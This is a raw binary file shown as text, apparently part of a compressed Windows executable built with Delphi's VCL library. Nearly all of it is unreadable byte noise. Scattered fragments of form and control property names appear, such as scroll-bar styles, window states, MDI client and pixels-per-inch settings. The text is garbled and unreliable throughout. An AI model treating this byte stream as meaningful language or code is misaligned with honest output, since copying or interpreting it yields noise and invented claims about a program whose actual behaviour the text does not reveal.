��� |b- �(U��a!��U��PA��C+8��\��s8�m� �p��t�{A ���V�f	 O�S f�xR tQ���3CT�SP� �%L�n�`02k ��f�@�� f#Cf� �;�u�1M�. ^[]�  	 ;PHu��-�@�`CS�SD����Ɖ ND�" �!���1��� XW��? P�ց�#��;wHuI	�&e�� �)�	!z	8�)&V�3�� �tQP�@�s�R����$� ���� ��7��t�03ɒ� U3���V0�9C3UL	 "��,��qɈ�Q�E�x VP�h�_ xp�� ���R*p� ��� �9���;�}XK/<  J�{0 tD��U�~��P��S0�� �Z�W��u�#U�q�L'���Tx �tbx� �EP��<����u�m���P���Ў�zC�EM���E�	��CP�O�Ad�� �|wB�3h�D G  ��U�CP =��`X�~Df����
�}� }7c � ��. �u��C��	 ��/ � t�u� �	�|�u��u�4 �}�(    鬏�Fy�@q�థ��T�@>�0	N@�a���!��C�� u��E�B���u�U}�U�U\� � \N[�[��#��	� t��PVW���`�eW�=� �	�HJ�4'� �$ � ����t3ɰV"*0R'!�EA�o$�P0�M7�"�N�2X�:=)�E� w�S +�@ p0t�P0�@A ���4OA4A��&
�B��G��}�P_� ����:�0$+ `NC �m��,0�,@� $G�@;��`Ի ����u�  {� 0< � <�:P\t� P\�P8��t@�*�  R�p�K%�1�U����k,ti���u2`�GYi}5 +	 8�� �45 ���$1T m � ��9��.�Z.�  �H4�Ih;J64u' ��j �E0�V8�LG�pP���1 PXK ����6E�> �%WK�pI�2FX��G?;u0
�R�� �Hd�#:� .��Nu�3�� �$�S�M��"~�� r	�U��|B/3ɉ?Ju���ȋPh�H�����_ ��PX<� ��Gth$Uh*�{���j�yn��l�J����q�B�j�N � 	MЋ�U@o�U`=� t6��+�:�H�>[�'�I( �$-
 tG��tw! H] 顤7�XK���� C�X��R���f�V�a|b�@� GKu��k�6�\6�6 5H5@FY50��6	 �F��IC0|`t? �
u �F@�VRP�/��%��`E�H�F��l �����M�U���A��t"�UС+X�&����%\-��� �� �@�m���F�-E�ۀ� �`Ao �;U�;Bu�0*��0HU����c�^�@��J$ +��$@$ �$ �Y0�P{�t �D��Rl���� . $� �X�����(���>�ȸr ��,��� ��@��P� GK�M]� ��k a?� ܵ � p���`B ��"�B��[� 쐧���r܋@
P�l������P�E��a���0 ����}.��`T	Eܢ�܍H��U�{��O ���F@E �E�,t �R���/`Y�B-Wf���T��et a4��1j��a�� ���)��������P�(Q�Z(a�`�Et�`� %A�pU䲰c"��^��!��!؍H!1��8�`�K !1Q!�!m Қ�lY�,`�, *9eV��;��? �0 U�%b%�C�u(�I�s>6a����� ԋ I;Ft�V �Yj�W�K)�Q�ŉP�F�Rr`F!F�`v�� �E��^r�8�k��H�g�{ uSh��H,|CI(��¬K&����,  �C�(-����;��t3�JDgXڋ�K��$��:
FXA*F\�A*F4�����R<��!�U@0 �F8�Fa�֡ԡb1�q�KW d�������V�E�m@1PY1Ӏ���| �| ��~ y' 1 �$r ���t�SpdH�@nT`�P � s}7��(1�CX舭��!�8�����@�P4 �@�TVI yI 6�@xI )��X�?�I0f�����Dd� ���U"������	�^�1WU�(��k-�/��t@�d$�CX�D$�C\ @�!<I<� C4�2��S
 ��4�� ��� U3 ���@�E�|F�S`f�,P8Chf,E� ��i��
�j p!mj WVUV�V P�;���YZ]�����G�p!N�#F3� �����;((u0 3҉CNu�; �8�,�}� ����(�F �8 
Pu
���
 3����E�f����"�cY�{�� ��Et,�}� t
   ��u�   ��G��T�0��L ��L���@{��t�L& �&�&@�&`��@� fT�E�P�M��#N/{3x-�<O�o����D �p��DP� T�ȁ��� �
sC�S<&uO�BV ��~1��HC	+À|#� �|�(u�	 )u��J!��� �s�u jv � C@ B@ ;�~��q����-�	� o�Ap|;�|=���T���0��!�|�&v �+�H|C 	t��*��� C;�}��aTO� ��M��U�M��a�%0P�U��A� �Z蔯� �1 �DT6 /���F�������>Y�#
 $��F*   X  �
~F  ( � TD 8 � �^ 0 � �   8 �_U�( � � � U\ � H� U � �( � ^H �  � �TD��P��Mu=&����^�
�$۪
�
�
 �@�����@ �)�w � �\�a[X ����H��%�-_s{#�\/�iV t-ˠ�
@a�K�-��v$ � @�Xz �* ۟�J��<\� �ɠ 0� �] л �����h���� T ScrollBarInc\���	�D pS
tyle �� 	ssRegu larssFl at
ssHot TrackForms�& ���T� H �� @:@ L P T AH �7@ �  ܇A �A @� |�D TCont� �`���\� �]A " �0 <�$�� \E �   @�0
Butto nSize�B* (% �%�   Color��:�
�t�  � 	Erementhi   i�  Margi+n ! , �e� ParB k ��& ԰�  Position�## $E 8� #P Ran.gei  C�  Smooth�A0 �d� j�4 ��	5 "?8  � � 
 	Thumb�D�$ $� E2"ing# `D� � Visible��܀�TWindowStat�r� wsN�alwsMinim{ Ldax02��%0݌�D�p P* V (UC 8�A�"��A�"��C�b�E  (D \�C @��C �� �C (�C AP< 8�A 0 PX p0 <�C @X4 �D �� C ��C �� �C ̃C A� ��C � @D H�C ��C  (�C  ԑC 0�C  p�C ��C ,D�| �  � E t	E ��C $ ��C M4 T�t   P�� ht  �C �
D ��T < @�( DE x@E< <�����| X�Z | N  ��. !D��}C�Lb�v�XC�c  �\ �,@<�� Ho5rz�c(( <(� Vert(`D�| T^Borde���� @b$nebsS�� le
	zea�a DialogbsToolg2s!0@�0(߈"d��d%0�P(  IDesigne rHook�hA  �C�+ �M�0�E�/$��10	 W���4IOleD @ ��� �R���  	�=��?Q��d \��
� �pu �� fC
fsM DIChild	� 0fsEyO	nTop�`�P B�@IconQ` � biSyst emMenu
bpigSfCbiH"elQ@��T6 �,QPsI�lh9	T�Tf �	 h 
po4Ad	fault
`4 Only`�!poeenCAerG ktop�0B Main�0�B Ow�p�0�� '^@MonitoQra 	dm[@�
 Primary
dm_PdmActiv�!T0\T*T, n�aP�X� po�� Proporal�0 ToFitG0 ��HTClo4sed���Ica�I HidF
ca�Q�a�- HH0Ev�  Sen�TObjecta0�n� $�jD 0�D 0Query�I�Can& B�HeaF0��tDTSh� Cut�B@MsgT WMKeyHandled=` �= �<
To8  Comm/  Wq DataI�ger�� ll-IPQ`L  ��� T�vH�D ��pj V� ���y$,E ��8HE$fH$6�E�$&h P �$F�E$&h[E1 �b$��E$��E$�H \DE$& E$��&�$6p3E �6E �5$v� $V�">E$fTE$f� DE ,E �� �WE d� �[Rx 9 ( �� �՗B<*L�P P� d =    ' 7 � @�
 �   "( @S�	 F @� ?� ��<� ���� ���� !��)�=� �D����� �������� �������� �������� ����������X@.	AE S� p �B� 5DC6 � � S(� � (E� L� @F   0G�n $HE �I�zX JD Y ZE � \0 '��	K  /L Y� � 8Q � ` �0 � R$R`�d<��D V H
h U� 0�6� 4�?H � � �(մ �� � �$ ��ustom�[����@��W��X�(�X��L� ; �� �'�Z�80S�{^�fAU (lA <  ���ݘ �E4 ���0+��k� e6`IP>C [CT�
f� AlM���H �\�� 
AlphaBl�T�% �% �%��   %pValuexEC ao �� p0�*� A*nc�sqL �t
-
��[q ut��	%\���0 % ��TA S_# p# d�j0  BiDiM
odeP6(k 8��$QN z��[)& d&��&PB)�SC l�����&PWidthV � @hp�����ap�]��C X��ܼ"P Cli�Heig*ht'D' �'�< '0o � �� ���NG�� ( ]ݱ�ran5spU~K�+ �� +��! FC+ t����� U*tr�t�!�6��6� �Q � tl)3D �  ��V� ! UseDockMana�_x1� YQX" ґ�R�R ��R�#  OSite�DC �� #�$�# ragK�L# W] `��%#0]ilP| P��P& En:d"YE bl�E�' 
�?F��$
B h% 4�% DÁ( �X/� `� Q� ) i	�k,LC  �!�,� M2lG����* �Filpeu���u��B T@( $$ 8(�+ nM�- ��,  
�	Preview<|D H! #�,l�- ADp4 ��. OldCre�OrtwD `% \H�w/) �*NI�R�1�l΁0 �1�1TJ|.Q @R  1 Pixel0sP4�(D X|Q �_	z�2 	Popupy�0�YL �3 �\�{5# #P�4!lء%D �H�%5 �  g"�B g�6 B
�<Snap%��� �cXg�7 �ewHn ��D �HP
 8H B Buffeu���u�pW�p ���C9 VisioH�" ���� �$V�C+j �	@�:2 �?�teX�& ��; 
&0��UA �% %�< 
On.'J LC �� %�=
 On�R|z\eK _&�> A& lick��v�i "�?"0�,��� "�@ �"@7-x� ȍ �A ' dUed�0=N�� .�B�.tex#����z ~��) ^##(�H #��OnDbll� %�H�E R	% e� oy$��  $�F�Dea�{A�IC �l ���Gp �D�4J�C! %�H%POver�HC �0�q�I% �J@% v�! %�J%PJp�� k o�K�E'ndr|Kv  �$�L OnGeBtmInfo����M On�[����N! ��GC �f B�`O�ZDown�� �  $�P�~5-ssI�q%�Q��% Up����"�RMou�w=nT�" &�S&`MoveL�&�`T�& UpMC; 8� ��U$$ Wheel�' @�# '�V '���+H' +�W+p]U#�s��XmP�"����Y-�y3p��A n�Z�w\rtCuH ��! H�[��0K�%�F�\P�rWtq��" &�P]�U#���󐐽8�p��D d$ ��"�^�E PF�C P�< �N0�A h�J@e
<�_D �D ���C ����C ̃Y ���
�C D H#��E�H \+�8A ~�C ��	B� �C ( � E �&E �P�`3�6E �Z5X�t  
�
�C ht ���
D ��h TE �	� ��,	E � �WF�� �R�9 ( ��� 	 � � , �B�9��� �����$_E( L � <`E a �� ��� 7O��xtН��M �t�tȐ�ȁ� V
 �Q @l P� xH �7@ R� � T/K�
@ (�XpX x��j � �ibA0"X��AX��@c��A @�A)  ��J�  �A0"8 0OXxbE��I8 T�8���`P��jA �8A  �� 	hT�e@I�� ���p0 |�j �N���t��s�Ps���+��B� �? T@� TApp`a!��p��	���|F Ë��@SV �ڋ���t= j�V��x�� ��t��u",7  �
 t %����P# �z��j7j �PV�� ^[L  ��F �@0 ��tj P�H� 3� �p��| 
 F���
0�����TU��S�];Ȕ t6S�� E ,S��
0"��  �/���ԁ& ��X�
 j S�v�� ���[]� �P0���SVW3҉U��W�"U�:@U��3@�? 3�Uh#� D d�0d� ���Pj h0� � q��P�PRe �B E�3� ZYYd���C@�9��9F�� #Ph*^ �E�n �E�} ��$# ��E �_^[��]����,�ދCP��w� j�� �u� 3����(. �uԨu�<�JY!;X0t@S�D0P��
0,j�S� �u�=�2  u�	��=� �	�P�0Q( l� �p7� P@t&�á&`�`j*��RP(��; �� [�� E��� �ȋ;]u 3��A�A� ����_  �$�D$ ��Ph,�z �Aoz�t���  YZ�"WU��H�\Pj+�N� �|)F3��נ0&��C u�S��� ċ!:GNuڕ$0�n:P#:�\T�40�404 �3ۋ�]���� H�D f�� t��
 U
 
 
 
 T
 
 
  j�� f��}� ��S T0��T j�w"pj�hp��- h K<��< �FD�� �F	 �!F	 �F	 �F	 �F_	  I` ��S ��'2�'S��d������ P�E����@K�E�Z�d��,�6C9; ' ��_ �I���$�F��qYYB]L!���qC�Nu��Ë��%=��t��[�3? �#���ݚ`� �@�� ؅�u1� F�E��E�`| �U��H���g� M�� � [A ��J���B� ���H�j �����VW��t����>K @�R�3ҋ�� �:�w�E �Gf�P f�O
���* 3���f�G�G�G 
�G@ <��G(J
�G,�GD�ǚ"�c d������|]� �@43��ƋH~��@;1!*���W�<�D�W
 z�
 
    f �Gf�C�	�� A��������{ uZ, � L !�����X u� �!�߼�
�SWp� �T; W tT �C[,r
, t��t<� C�{[t� h�D "Ca� l	 :�u+� E�@��PS@SH � �Y����U�B��  SHP�[]� ��l�Nlrf@�f �fP�f� DSJLf@�f�Lf@ | ��lRG��X������%����$o"3�'&�E�+@�3���K��|:C3� �HxWU0��� ��������
�Y�p���YFKuɋU ��E��@�	 �|!�� � �2��ؾ   �u�    tjE�����?����u3���h L�8f���8    2 $!�t�8 �8���!%��3���* �x� u`	 � t)	 P����2��P�<���7�E+X����.2@u%�2@q20t2��������M��Ur�s�� ����� �� � ����!�zu Uf'���>gV7  Ȋ��؋�@�  f� .�"�b"@hA�ɠ#r& ;C���!���SV�E��E��� J� ��p ��v�E�hPjQ
��$��0p�ui�A` z�w�� � ���T fB f�����r #�G3 �X���J@���@�U����2�! @
41�H<��@	0 ��3���"�3�����X4	3�+�_ R ;�}+�
R��� ��p rtf��tD-;�JlPE+��膂70��"��s$&�`�&�M �1��Ē ��e��}� ���rt%�6G�r� c0Q�� �Uv`0�`,�Y�J,���4v0 �@�� �$ �$�5E U q � T� � � 8�� M0�1JShSq�D"���LD�sɲ���	�=0+!�!�i�!K �
!@�^0�x�  ~U�#	Y�( �� �d�U�� R���m�
9��` 9@�(T+9�����U�� � �%Kd9�;S$t6 ��3��C���P
$���S$�C4���+ ��C$�,; P(t�P(�@, �@& n��& `:P,t�(P,�
  ��h�4PW��@ t�S�@�C;�~ �����} 3�,'3��f� ;�t`M.  +�!3ɕ����� �+� 3��� ^0t���B�a��P`t��	�R��WB�����@;Ct-SP � ,�0�z�<0<��<�0<Q~�c<Q0<!:P4t�P48Q\" \ ;P8t�P8�PD@�ʉH	��}�	P@*��HƁ�>'�@��e� ����P�-�	d9~u� ������P��@4� 0}�  ��� ���>��9���x$ ~)j $1�U�1p�1 1@81`T81��1pe1 ׭�1001`01��1p4�1 �1 )0(�*��.��.p. x�. �f܊�f�0�PZV&f�j�$�M��U������ �z+���x��}:@�Eޢ6��B�� ~
�	�E��E�N`B�N @�E�  �E�E�U��@D�Q��@ j��E�	P���@:�(��gB����$�1V �p�+`�f�X̅ �tJ 8k�f�BD��[�T2^ڈ�@���TFP�E �F����+E�����l*jp/  �E����t+�W �t��
P�q@J�L ����A �D�Ӏ�W��-�~ L1 X;@�'z����c$�[�HD�����l��x
 u �!�x�%x��u% �,P藫t����# ����+��H�f��+����;�x\ u��� t���	 93��	�XP(E�N�
�-��T�1
ET]�_�� �����i ��@�h�C;E �3��� �E��}� 9t 1 ()��).�"��h/7F�N�һ @��/��\v���+WH+W@W L~��CNű �pBB ��8 ��w�R�%>�6Z�* � �T&��!&�v�]��� 9=� ��4��[BX�؃�����= �= ,���!� �!:��0t-� �	� s���&80	�u  �: ���<2��Q^� "@��Q�I�m,�ۈ�7�����˄�#Uh7��ƀ�.���q S�1&�a�x�� $`�%� �\+q8��&8 �	80$8 _8�)L@& K&�9yQ`>� �` ��3�{� 0��t�Bu,�a#�"U����"V��	�S)��0D�j1)Gl1� GG�L $,����T$ �� �D$� �G)�W* \�*��*P] + �7��}y0�����
C- 8��o;�}5 M* +� s *F�AC-VW���E �w\0"\ u\jD�\ O 6 �\P \G���: ���}]@��!�/F �� ]h WU=4;�t}�_Cp�0�0
�bl��b� 	Ou@"��!�}iW V�EP�]�	Ћ��	���4 ��\ @��wP] w` � �t�4H\�@���D�0\33 ���3�Uh�B2d�"]4a ����S�� rt	Jt
�E����ͧ*R��\#�B�E �V�V��a0�g�ls�%(���rk, �"?�c�5u@c�'E�E @[���z 
u��/ y  ��C��>	�%��=��$PD $@�!�$ y!$L�-F�{A�("R�툍�D$P xЋ��"G�А �ȏb�ڋG ���^�� V���t$�� ^�!�����!�?�^�1.Uh q.���pF
 �C)�&
) �(@"/Uj�>�سMAx: KU�P���m�!�$��t�t:��p6x&�%� ���S3ۉ�	@X^Y*��\9��P4�4L+���Px˺,���@��E9&��;�D��0�"��0���3R��J`�1�.n�J���C% ��%������E��E���H���ؿ��R�� ���X�������:a��o ������� �"��4mLo 5X����6 ���Tc8�!`*���{�����C I�X}��[��D�E��Y�؀��z ��yP���  t��f����'����pߴ4�#�i�(���U���b(����	CP iv;	6	 �@2��R����`j 3,B �!~{����@b1�d6@j2���'40�X�@�E P �BC �P08�)��	�i���Dܟ ��(��)� ƃ+-�1� ƃD��A�j @@��\* B5�'���#�	�X�0 � ������$ `	@w�	 a�d�����D�W �Q����6 W�À}��e�k���^}  �  ���W r����@|� 0�o�	xj�����dXB�	�.�$�/�t$ �?ت�� 8T��1� �3F3u��xI���N�#��(��3��%$!P�e$��1�P$ ����r)i ��0C�n�����S �R�� .�5Y*��~�%E Y����v f��Tһ I�m�p]��� ��������k@��&<����v$=%�M%p �t�3�8t
{ B	 u �} |��| A|T�|��| �|��i�� :�:}ty t ^0�<cܛu � ; ��t"�`����f�����V�	�	��p"� �U�و����Q��IoE �,�w���L�J�@0-9�����\<!&p�B  �j���aG$����H7 z;	~uuV�{V (�"V d} �  �Y��D��*t|`�&0& � �l���3;H�Pu	s�虊9 ;�Xp` `�p+ ��P{!�� �MS�(�&���gk"Q��Uh��h�҉�jh80lpp���e�F 4�9��h K b�UE���_�\�5 �L0�#�� tC#, �-;B@t/�`P�TPphi
"fO�S�)�9�_ %P� ��K �� ��J z;���r �o� lY��0v�ż �0t#>`PX
� P�kA�/0/� 2P�m/P�AA/0 tF/��P�>/P#��# p#P�`��~
�e*�+r� ��r�pX0����A����u$�a�)% C����a���jk�=��H �6��L I�
�Q��#�������I j Sh�E  �K^���(� �8�WShE� Sh�p@�vh @� T0���G p Pix elsPerIn8ch �TextHeighQ@ Ignore FontProperty�� ��p�gB�&�w����\ @���/�P#�@��+6��B�4���@�e�` :p�� �����0�0��P��L��l�ؑ����t2 (Vp ���� P��O/#@�WVU��PW �khm�
[��0�� �m�����8 b ���&?��jt28B#�jh�9�F�zoV��  �� HU�����R|�6 4L�D��=��n�zd�s,�x 3�ð�	8 �� ��(,t,tx�+:�Ju [2 �!���%��@ n	]��&�   �  W0� � �  V� ��  � `�Q��[P�YT� c��V��j�! Q~! ��P��/& �����P*j� _ �V�Q�CL+FFGCH+F�RuR ���6 �U�~C�u�u! h���;�uB �� ��H��|6@L�E�����uO %K�  (@KE�U���M�uՒ�	G p+���@��!BXz����	t3�� �����L$�$ ��$�`RN��&� �� ��� �X	 PK\)A�D$� �У �K��|7C3�� �4� � �J uT�/ � ;; u�$ $�% �GKủ
GH:	S`t� �tc{0 u�t��g���p�CTt��p��E 
�G� ��"�l, �0��*��0��00,%�ڋ����-t��t	��h)�#��	��  :^WC���� �	 =q�q� �$��W��+u'�xW t!�\	$@\	�DUM��� ���	 �׍�C ��L�	����`�� C0�%;�t!��uzȮzis_xJ!N�@U� ĕ�4EP�DU����8`��X,��1�BC ڻ�� ��F#��w����r)��"�Q?J�KC �t��"����) Jt�` �=�(|F� �;��	 Yo� 3b��+Cu��Ԭ�*� 贌���s'�J;E�t� ���_L V虒��^d0��3# �D0f����K3�3!�#!P�(�! @�@ f#8$E f�<;���*��0	 H,tsR� 7C	�H!`,2��6PGu�b�1 �0�E�E�8�
I�30���4�{ �P���3��Ş�����[ �^�]�$E��"j}�@P�KfE��Uhd�P�E���Y����(��0E�+
�H�%U�سD�kL ����aB �E��+q q ����,��/`.Q-x� #��s�>�� ��Z�@�V��(͝�Pc-0�֔��M����#��PQ�	a�`�E�P�vJak�pU�
��� � ���FP�N
!G8�`r�B 
1W9!
d 
d ���@��,`��, *q�� �$�����VPN'�'�;� ufM%%?J�PJ$@P5@�U~@	@�P@n�P�Z� 

 &��.��*! �H8W�@��@�]
@K
0 	0�T�lPt�+�In�R��B��$�$0����6!C+�9 ��]r3u ��FKu`�@@�Č�U`�}-~ ���@� ��t5��+����E�� U�=�EY, �x}�P"	��@�)l�	 �f�	�U���QD�E��� � ����t>�"���	�E�e-1�nUpU " J0��J �^�� ��Ŧ `P��CL���U��#�3��\qP��\�� �0 b�}� u�E���8H���	Uh�j&	S- B���� �M��U��=f����E ��E ��M��ًU���s0�T! -U�,]E�b�f �` ���� �魁���U����w�������VΘ��2Gj��~+� Q�N�+� QWRjP�撃���1!T10P3�c 7 j�PF�|���PQ�p*��f ��,��_=c*ґm/ 
%��� �����v	�! 柉� $P. ��.dO�  x�O��|-G��9
�zD,�)� ! �$���FOu�Z0L�Q��"D�+q ƀ��-(�X$x	` t1Z@0I��7�P4�Bp��P_P62�
 l�a4M _` ����SQ@�L
؊$:�J( t � �C�(\���AZLV��:�����O��2��Hd��F9 ��#�9 ^�!�!�<$�� �{0����J�_ �`eC� t;�u; ��$	�1i@4
��tL;Tj%��u���� J��,��<� ƥ  MI a%À
"3�SR#���3�6h0PR�d�B6�:VW3� T7�T.]&�O;�T���0% dZG���ǜR��LPn;id60L`9%L@�^:Lp~9EP x�$]+������%�P�S ��.�V���]�J�WU�Z3J��jh���C��� ���vmFw �0(�  ;xu0 �C �� � �P70B�% �@X�\[WC� ( �@��P�*E(���$��@M �9�MP%�`� �0e� � �Y ޸CZ�,���81`@�Ê@^64�<� �'F!��"�+d�U��>|:�{tm��u�� u	�"?��b������,�2  ��t<u	���u% Q���	  g�4sC���_V0	�a��<��耽-2e��-2\
�P�>E4����FX@�ee�/H;�Cr��WVh����2�EE��t) ) �B��>!�L�D`R�tF"&� ��	���~��$ �;�vt@� ��t	���������x;c�2FɉMf���n.�V�p��28�a���0�7���uUAP��!F~ ��E��E�B�U���*R7���]c��N ��G�M�u���BQ3���A��Cu
� @�t3��[�# �� O&� �b��'%��21��Q0�x\�`4u(tX
'�΃��** �1J� ��}+};�t�P l z��@ >"� �J?g@t6 Ha tE+��75 Q5 5� 0  G5 ��.P"v Z�/��Cfu��E��_;���b�GJ��\@!uId;@@ o��S�rt<��$ |t	���4 t��	�"#:��t� cu�߃ ���0 �\?�� �\ :�t���y�P0<3� *�1`�
��@�Sp�%���2�đ
�e� �¥<`�< ���#tFA��Cpu'�*��]c�{p����# ,#B �H0ξ���Sh�� hP��5 ��!��� |��/t.� 0$"� ��� 3�����}F���B���GhFU�����1&|T5|F���B%�҉$��^(�@D���� �l
SA<0<u! �c�zh tDnAh�+p<�3қ3�3i  �� �%@D$0�� ���\ @ P�v�:0;$D�9/$;9 �ln #0�#��AY G�D$	 �T$�2�yE@�9�*$ ��\< uz�CHP�kLUpPN+ �Mj0�@< + ���y�� 
Z�RP�u/` �0"1 CH2@�Ջ�Y�(���	��<~� �2; ��N ~`�� ~���k~���1~�j(
/@^/)B +k@3qFGZ`J3�.��!8�% � � �;�}\)P� / �p�1� 0 �+kH�P��) CDUP� 0�� Z+Љ /P�V����}*� D$CL� -PU{z1�iL10+SL^ �CLP�L$.�Q�MO��F�L$�b ��h'X,�֋����	�)� 0 u�����'�;��F�f�����F�"(�G. �N�'� �4 ����H,s�F�� ��F�H�����*$�X�Y6�1,u�$$�����$�4E 7 U� ^ ���P`� j �5E !�y � �p	 Hě@,m u[�F�0�K�F
 � �F�FW �V����&��U
�8�+ @ �1 + ��p 
"Ë�(� $�D #D0LXD ��*@# , sFQ��t��t�0 ��@� 4�E	�0 ��0��  3 3@R   �2GX�?�rP��n@� (�-w`	M SV�����%����`t=$H0t�- Pjh�� �ñc<Vk�
`y K ?�� ���z����V�� � ����D��)�t
�[��.h 3VWX 5UX  M@h�qh�A�D$  P��6E 3�a�Jh=���-Sh�$j��� x j�']%:�%t9-Pp�j~ 4�¤� YZB!MDICLIENT� �(
��LD+:��,:�7,Z�H��Y��
 �Vc	UMu'��B�h��-B	R Z��
=���BL �E܋�E��!�E�B� E�B�E� �B�E��B@g
�B�E��B �
�E�>2h �~@���0��!���� �-��P~  �#� 󥁥X� �������p���/� e$��I 8�	��!��C��N\R�I�H��h tR% :�fh!���c99 gД��	�1�l<�_G�>uQ[P�P�/$���$6� F:�.��1$ �$ �q5$ �{���<��j)�1X9�Q ;�Gtp��tE;�t �cÐo	�u;*u0��f����� � �u!�U�����E+���QB���i Q < �Z��1�f���4�L ba_� �E	��u_��J#Y]�9W���l
��$���v@�V+	�F0��� �t \@.�0��T]V���d��% ���uͬ��ġ $QQp  �U���3���|w	�P�";}��
E����j��
 �9U��Pd �xh�I P���}I���`��LH�ǋ�D ���U*9@l*@L9 D9pSL9 9 �
 9
 Pl� �@T  ��dE�f�@Tf`<�U �f�BT3�U hD d�2d�T"M@x�T�*�P��Q`xf�H�/��u
�MJ��l] �@xQ@Z4 f� ��	�&P$&F& ���
 u�	 ��!;E��� �5�0�v 0�	 f$�{��U@��U ��WF�U��~��!��6�u��I F#0;C u�, G !�����dPPrP��`u�3�(p0[ %[ �ܖ����!j  ���3v% uہ/ P3ɺ� 	���f� �|X<DP tj��*� �� �bK��@���f#PT��PT�����*9����26  { �B�g�#���2��� �-ʼ��� � ���3��uQ� )���6� �c��
3��@, �˺+�
, m7"��x u�,jj �W�3�|j/���	 GZ)��Op�)���S�$ tV�� ���e��>� ������ � ��賈P0V��b�U�hG-yG�`�ID��� tAt0;ADtib>t&`��r tN3��.$��70��	�y\ !u	8@u����u��z���"������	 ^��%WU��`��t6�ދsbD�
�bJ��b"�  ;�t��U� ��!��*Ĩ�ˋ�)� ���f���� �Ӌ�� �:��E&�0`0o�00�0p�0 �0@f��� : Ћ,�� � � ��D@��P��u
�!�C�(U��ЉF�`�c����Uh�?YV`����0���B�� *�R(��!�������Js�; S`.S �%��C��%`�%���#�#�W#��1����T$$#3���d�	��|$�� �f����� !�& r& ��M��|;E�^�\$iu�-"�"�;F 8tE 9C ����
��Mu�2 f 2 ��J��1��!����?���0�� )f��@E fCTf�CT�'0#�� ��f#�0�0T �; {�y� .�1	j V�'.��"��" Y ��@QK����33G	P5�(u/sp/ ��
��P���2QrD�
���[ ��(0�� f ��(�,� �/� �D� �����?'� 9  �41hc�8��S�E�@����d�: ���s��%&@�:�� �	� 膷��� ` �N�u]c
0�S�,��h�jS�`S�q� '�S�0U  ~0  q@�N d �8��um�80� � �a0� [)��C%���	 ����U���Y���hJ~uu����ul�!f�Y~�8�U5j<lAa Ӯ�|Zh�2=G �7 ��U"��T�Ѐ	��ɛ�T�:���d��� �m���U�W��5%�B+t� �! �! �F�#�x�6��c �P u�F0	f�V0@\} (��"�7��0&�Ɂ�R���T$ 耂9 ��}����~ u�b��@P�1x;���D��T���0d3�f �z��uf �z t)3� �B�B t�P�BP��k˧�� *|� �Z��FX�H��%"�Mp	3�0�� eʀ k
kq��k[3u6 t� ����Q� a�+"�������������d� �q�	�#�#4&��Sq�:��_��S,3������3\�
S��"�W�W�2� z\ t&�s��� �N�"����M�C��;�@F)%�=ou&!;XDu��21+�5@-'`' u�{[ t	��9BF��|T�t=�u�4 4 +Q����=��PHt��	tI�wL ��� �*�t	ƃ,���! � ���	0u���� t03�� ��$}F$.��F <F90!��� 
�/}5���5=�]�= ;C��� �! ��Gt!V��tP��&2��� Q UB�$��j�J ����ٟ�:�0�ls��c ����5�B	.&5�@�P�;�qyB�p3�`� 853ۀ�P�u��Xt��0 u��T ���cx ��8@� ��;���PL&�5����k � ()���ES�
�M�V�1uITY��=�� �xu]�@���[0� =�D�	�4���6�E�P�M��U� @_ �M�3�3 ��%���U܍M� �C���E��"r� E��K�E�U��F$��E ��}� uU�F|�@MP�E$M`��aM@Յ�M ���t,� }�u&�M�b��+;�]F� M4��&0K �(�, �U�0�E�  � �U�0lQ �d|.� �X$������^[ ���9Q�$�@�HuU��*��"L� R�F t�J�X� �v��X�	 �Y�J �XPPB  P�B$P�J�B���Sl8L
3Zr�3 �+ƙ3�+� �U�R�;�@� }+�3p^m r*;U���V�8��C��,�xu
y���߁�U�� k � � �� �M܍F� v��Y  � @h  ��FH�V P�"HH3 ��CpL�& ��0�G �v��W�u��	����#���` (T$������$0�$��j� �$��f��| |f)f��	t���	 r4�gj�!@[�f�t0����<�����F��eA.	4j �f��'t
 (t3��P0s�4%5��ݡ�7�1m������*{؞l}&-	~.t!J��X���M ��� [A �Ht���o���2EG�#��7 3�UhX 2d�F"X@��@
%�B�����UhxL��f�����}��e��W�=�qz �K 0� 90�d��*�j���u8��U�p>�,E�+ XH��y�Ӑ�n�U�+B L��y5�� �0��Ou5�� *2P2 ��}3ۅ� �� �RHR LR2�Ȃ"n���@xPW�5�����0���X
 �����Έ^T�pD�`u�O%tO��t/!p5	(�^H��^@�FL��%FD�Pj��E���,��0���� �� <�����Y<��������m���&Ɗ![��P�u6a��(M�rh# 9~T 
P��"$�$�#Q 6��C�4�(" �Z�"�" �!H<2�
���$��$h�n@ �L) ����h4���f� �*Y2s�o�s s �% �AP������霣%윃R:��:��!�@l;E�uf
�� *�-�Q�~���E1�s4th��.�m�( ֨�H� �o(3�� ���B�� ;�u!��% k �-� ��x �S%Y�@}4 �!��S�JY �0e �q �g�������:���`1� �E���<�g,hE	��E@6>��	�)1-ʡ	|��4 4���	��9W!�x	D t.�Q��� t���^P �K �5Q\ �~Y !tXq-�Fh0�! �E��	B �����&}R�a* z*�` �&���1��� �H'WM���f�����$	�L�3��C��8Q��1ǃL�E% �?7�rO�@��t�$�
  � �ԕ���J�r �<$ t=�lK�2�7� ' ���� � u�K����/�	 � �H� � �0u.p! Zր�N��|F3��� ��p"GNu�f��D��!����� ��� �$yZ	��7}A�S}Q�E�(+Xp �U��#� \;� E�,r��t��H�LX�_)�9 �c"��r�:'$P�c�6����B� d�� !c�  �?��2�?��Uh~T�P��A.�u9�{W.�P�L�����l �L�LX�k�L#�]  ss�U ��O�h��h��e	 !�7 ��P��� P1���҉U�TApW��P��$;s7u$�^1�t�tu���� �܀� G� T�PD�k� �FQ�.Y$�7 P�� � a17$�	S� I19��`��|F �E�?5HQxGE|�-�VE
U��P0f�f�E�3��6��30H�E���*��X �x1x��f(��VPO! �O �P7� ,��0"�1
@���� Itkǀ�S� $�� t�"���%�# &�mm �m@��m��6� ����p
;�Kt0E�b�� %EaT ����a�@;� �P;E�uf�U�1��� (Q� �E�0�_10X|�{ ~"K+��� �px�քQ�,���
 �Px�}� t	�E�P�� 0�$f����� �is�`Z�H!""  �����F�w �E��]�@�����Ey��<�&4F{tR6�n�C�4 ^��Q�t�#���x (UC ��%�P� o����M��uT��q0KGP`�R\
1�F4�T��H�$@(�Ƃ ��@4��� �x> t7@a �U�n /nj ]Ð�*x0Н1^H���,���My� ����~/@uTf����`�� @E����P�(	#���=�  u3����n�4H� ]4fmHQUNHa�B!*As���Kae�K!��! �!0t��L� �3UA�QSi�QV1>VQ5U�=�1\ %"@WEU@
